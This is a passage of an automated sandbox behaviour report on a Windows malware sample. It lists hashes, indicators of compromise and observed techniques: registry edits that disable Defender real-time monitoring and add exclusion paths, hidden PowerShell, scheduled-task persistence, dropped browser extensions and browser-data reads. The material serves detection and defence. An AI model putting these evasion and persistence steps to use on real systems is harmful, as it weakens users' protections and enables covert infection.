Analysis
-
max time kernel
197s -
max time network
198s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
01-07-2024 05:01
Static task
static1
Behavioral task
behavioral1
Sample
195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe
Resource
win7-20240508-en
General
-
Target
195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe
-
Size
7.3MB
-
MD5
8c0a58affee51191582ea4dc50399ff3
-
SHA1
ce4adefe7b40cd0413d58812b84e6c0d9f8d8b3c
-
SHA256
195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285
-
SHA512
79c10575e2bee4430b9d813efe85b98a4bb9088480f68d7b9e478e18920c5ba0aaa5683bffe0e805deed02133b66ee7e64cb075761a1a6a416476ee751d7fc10
-
SSDEEP
196608:91OzsCjnE+qDP/qvmn+STt1tfuhZmWjT8lQVCT:3Oy+I+eD2xT8lN
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jEUQWIQvPKxTkmGv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jEUQWIQvPKxTkmGv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LXFcSqNRPdfiC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bmRmotOcEZUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jEUQWIQvPKxTkmGv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bmRmotOcEZUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\MEjESHlTzhJRobPiA = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LXFcSqNRPdfiC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\lKoxjEGWaXzMwnVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DLOGhsaIU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JoukbHKXhnJgygRymeR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JoukbHKXhnJgygRymeR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dqJSprjCYNjU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DLOGhsaIU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jEUQWIQvPKxTkmGv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dqJSprjCYNjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\lKoxjEGWaXzMwnVB = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 772 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2832 powershell.EXE 852 powershell.EXE 2952 powershell.exe 2944 powershell.EXE 2984 powershell.exe 592 powershell.exe 2544 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\International\Geo\Nation hpiTpDn.exe -
Executes dropped EXE 4 IoCs
pid Process 2392 Install.exe 864 Install.exe 1976 UGwXVSe.exe 1816 hpiTpDn.exe -
Loads dropped DLL 23 IoCs
pid Process 1376 195be17b5e8a2512b4fe95fe601f78744851ae6925e3b70ec89890ede8a17285.exe 2392 Install.exe 2392 Install.exe 2392 Install.exe 2392 Install.exe 864 Install.exe 864 Install.exe 864 Install.exe 2732 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 772 rundll32.exe 772 rundll32.exe 772 rundll32.exe 772 rundll32.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 1876 WerFault.exe 1876 WerFault.exe 1876 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json hpiTpDn.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json hpiTpDn.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 hpiTpDn.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol UGwXVSe.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini UGwXVSe.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 hpiTpDn.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 hpiTpDn.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini UGwXVSe.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UGwXVSe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hpiTpDn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 hpiTpDn.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\JoukbHKXhnJgygRymeR\cieDguK.xml hpiTpDn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi hpiTpDn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja hpiTpDn.exe File created C:\Program Files (x86)\dqJSprjCYNjU2\tbTmiIs.xml hpiTpDn.exe File created C:\Program Files (x86)\LXFcSqNRPdfiC\KUcBsgX.dll hpiTpDn.exe File created C:\Program Files (x86)\LXFcSqNRPdfiC\oSirhWH.xml hpiTpDn.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi hpiTpDn.exe File created C:\Program Files (x86)\bmRmotOcEZUn\RQTtfCh.dll hpiTpDn.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak hpiTpDn.exe File created C:\Program Files (x86)\DLOGhsaIU\VdtzmWp.xml hpiTpDn.exe File created C:\Program Files (x86)\dqJSprjCYNjU2\SucWBPxEhBZcX.dll hpiTpDn.exe File created C:\Program Files (x86)\JoukbHKXhnJgygRymeR\CiPRYjd.dll hpiTpDn.exe File created C:\Program Files (x86)\DLOGhsaIU\uWPEBc.dll hpiTpDn.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bkulktKnsMWheyTcHH.job schtasks.exe File created C:\Windows\Tasks\QGKRfysOUInPGCvKQ.job schtasks.exe File created C:\Windows\Tasks\WIDyJrOtfliIWWA.job schtasks.exe File created C:\Windows\Tasks\xOqIMlfoTdTUPfGRn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2732 1976 WerFault.exe 39 1876 1816 WerFault.exe 185 2780 864 WerFault.exe 29 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs hpiTpDn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0024000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA hpiTpDn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0024000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates hpiTpDn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" UGwXVSe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates hpiTpDn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0d2d0e373cbda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached UGwXVSe.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" UGwXVSe.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs hpiTpDn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1589BA4B-9FEC-41F6-82CD-CB97304CF2EC}\WpadDecisionReason = "1" hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates hpiTpDn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1589BA4B-9FEC-41F6-82CD-CB97304CF2EC}\6a-15-f4-39-fd-1f rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings hpiTpDn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1589BA4B-9FEC-41F6-82CD-CB97304CF2EC}\WpadDecisionTime = 50004df673cbda01 hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f\WpadDecisionReason = "1" hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates hpiTpDn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1589BA4B-9FEC-41F6-82CD-CB97304CF2EC}\WpadDecision = "0" hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" hpiTpDn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f\WpadDecisionTime = 50004df673cbda01 hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000001005b9e373cbda01 UGwXVSe.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-15-f4-39-fd-1f\WpadDecision = "0" hpiTpDn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1589BA4B-9FEC-41F6-82CD-CB97304CF2EC} hpiTpDn.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1092 schtasks.exe 2196 schtasks.exe 2668 schtasks.exe 1944 schtasks.exe 2856 schtasks.exe 2124 schtasks.exe 2208 schtasks.exe 2552 schtasks.exe 3016 schtasks.exe 2596 schtasks.exe 1504 schtasks.exe 1016 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2544 powershell.exe 2832 powershell.EXE 2832 powershell.EXE 2832 powershell.EXE 852 powershell.EXE 852 powershell.EXE 852 powershell.EXE 2952 powershell.exe 2944 powershell.EXE 2944 powershell.EXE 2944 powershell.EXE 2984 powershell.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 592 powershell.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe 1816 hpiTpDn.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe Token: SeIncreaseQuotaPrivilege 2564 WMIC.exe Token: SeSecurityPrivilege 2564 WMIC.exe Token: SeTakeOwnershipPrivilege 2564 WMIC.exe Token: SeLoadDriverPrivilege 2564 WMIC.exe Token: SeSystemProfilePrivilege 2564 WMIC.exe Token: SeSystemtimePrivilege 2564 WMIC.exe Token: SeProfSingleProcessPrivilege 2564 WMIC.exe Token: SeIncBasePriorityPrivilege 2564 WMIC.exe Token: SeCreatePagefilePrivilege 2564 WMIC.exe Token: SeBackupPrivilege 2564 WMIC.exe Token: SeRestorePrivilege 2564 WMIC.exe Token: SeShutdownPrivilege 2564 WMIC.exe Token: SeDebugPrivilege 2564 WMIC.exe Token: SeSystemEnvironmentPrivilege 2564 WMIC.exe Token: SeRemoteShutdownPrivilege 2564 WMIC.exe Token: SeUndockPrivilege 2564 WMIC.exe Token: SeManageVolumePrivilege 2564 WMIC.exe Token: 33 2564 WMIC.exe Token: 34 2564 WMIC.exe Token: 35 2564 WMIC.exe Token: SeDebugPrivilege 2832 powershell.EXE Token: SeDebugPrivilege 852 powershell.EXE Token: SeDebugPrivilege 2952 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1996 WMIC.exe Token: SeIncreaseQuotaPrivilege 1996 WMIC.exe Token: SeSecurityPrivilege 1996 WMIC.exe Token: SeTakeOwnershipPrivilege 1996 WMIC.exe Token: SeLoadDriverPrivilege 1996 WMIC.exe Token: SeSystemtimePrivilege 1996 WMIC.exe Token: SeBackupPrivilege 1996 WMIC.exe Token: SeRestorePrivilege 1996 WMIC.exe Token: SeShutdownPrivilege 1996 WMIC.exe Token: SeSystemEnvironmentPrivilege 1996 WMIC.exe Token: SeUndockPrivilege 1996 WMIC.exe Token: SeManageVolumePrivilege 1996 WMIC.exe Token: SeDebugPrivilege 2944 powershell.EXE Token: SeDebugPrivilege 2984 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1888 WMIC.exe Token: SeIncreaseQuotaPrivilege 